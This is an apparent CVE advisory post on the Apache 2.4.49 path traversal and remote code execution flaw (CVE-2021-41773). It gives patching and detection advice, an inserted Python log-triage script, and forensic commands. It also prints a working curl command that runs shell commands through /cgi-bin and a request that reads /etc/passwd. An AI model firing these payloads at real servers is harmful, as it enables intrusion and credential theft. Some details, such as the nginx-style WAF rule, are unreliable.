How CVE-2021-41773 Works:
This vulnerability affects Apache HTTP Server 2.4.49 and allows attackers to exploit a path traversal flaw in the URL normalization process. A misconfigured `require all granted` directive in `.htaccess` enables unauthorized access to files outside the document root. If mod_cgi is enabled, attackers can execute arbitrary commands by sending crafted requests. The flaw arises due to insufficient input validation, permitting `%2e` (URL-encoded dot) to bypass security checks and access restricted directories.
DailyCVE Form:
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal → RCE
Severity: Critical
Date: 2021-10-05
What Undercode Say:
Exploitation:
curl -v "http://target.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh" -d "echo;id"
Proof of Concept (PoC):
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: vulnerable-server
Mitigation:
1. Patch Immediately: Upgrade to Apache 2.4.50+.
2. Disable mod_cgi if unused:
# Comment out this line:
# LoadModule cgi_module modules/mod_cgi.so
3. Restrict Directory Permissions:
<Directory "/var/www/html">
    Require all denied
</Directory>
Detection (Log Analysis):
grep -Ei '(\.|%2e){2}/' /var/log/apache2/access.log
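Added example (not part of the original post): a log triage script that percent-decodes each request path before checking it, so mixed forms such as `.%2e/` and `%2E%2E/` are caught, and that reports the response status so requests the server actually answered stand out. The function names are hypothetical and the log lines are constructed samples in Apache combined log format, reusing the two request paths shown above.

```python
import re
from urllib.parse import unquote

# Apache common/combined log format: client IP, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3}) ')

def has_traversal(raw_path, max_rounds=3):
    """True if the path holds a '..' segment once percent-encoding is undone."""
    path = raw_path.split("?", 1)[0]
    for _ in range(max_rounds):  # bounded re-decoding also catches nested encodings
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Compare whole segments so names like 'report..final.pdf' are not flagged.
    return ".." in path.replace("\\", "/").split("/")

def triage(lines):
    """Return (ip, status, path, verdict) for each request with a traversal segment."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = m.group("req").split(" ")
        if len(parts) < 2 or not has_traversal(parts[1]):
            continue
        status = int(m.group("status"))
        # A 2xx answer means the server served the request: escalate those first.
        verdict = "served" if 200 <= status < 300 else "rejected"
        findings.append((m.group("ip"), status, parts[1], verdict))
    return findings

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Oct/2021:10:01:02 +0000] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1532 "-" "curl/7.68.0"',
    '203.0.113.7 - - [05/Oct/2021:10:01:09 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 45 "-" "curl/7.68.0"',
    '198.51.100.4 - - [05/Oct/2021:10:02:00 +0000] "GET /icons/.%2E/%2E%2E/etc/passwd HTTP/1.1" 403 199 "-" "-"',
    '192.0.2.10 - - [05/Oct/2021:10:03:00 +0000] "GET /docs/v2.4/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [05/Oct/2021:10:03:05 +0000] "GET /files/report..final.pdf HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, path, verdict in triage(SAMPLE_LOG):
        print(f"{verdict:8} {status} {ip:15} {path}")
```

Entries marked `served` are the ones to investigate first; `rejected` entries indicate probing that the server refused.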
Exploit Deep Dive:
- Attackers chain path traversal (`%2e%2e/`) with CGI scripts to execute OS commands.
- Works only if `Options +ExecCGI` is enabled.
Protection Script (WAF Rule):
location ~ "\.\./" { deny all; return 403; }
Impact:
- Unauthenticated RCE → Full server compromise.
- Data exfiltration via /etc/shadow, SSH keys, etc.
Post-Exploit Forensics:
Check for backdoors:
find / -name "*.php" -mtime -1
netstat -tulnp | grep -v "127.0.0.1"
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode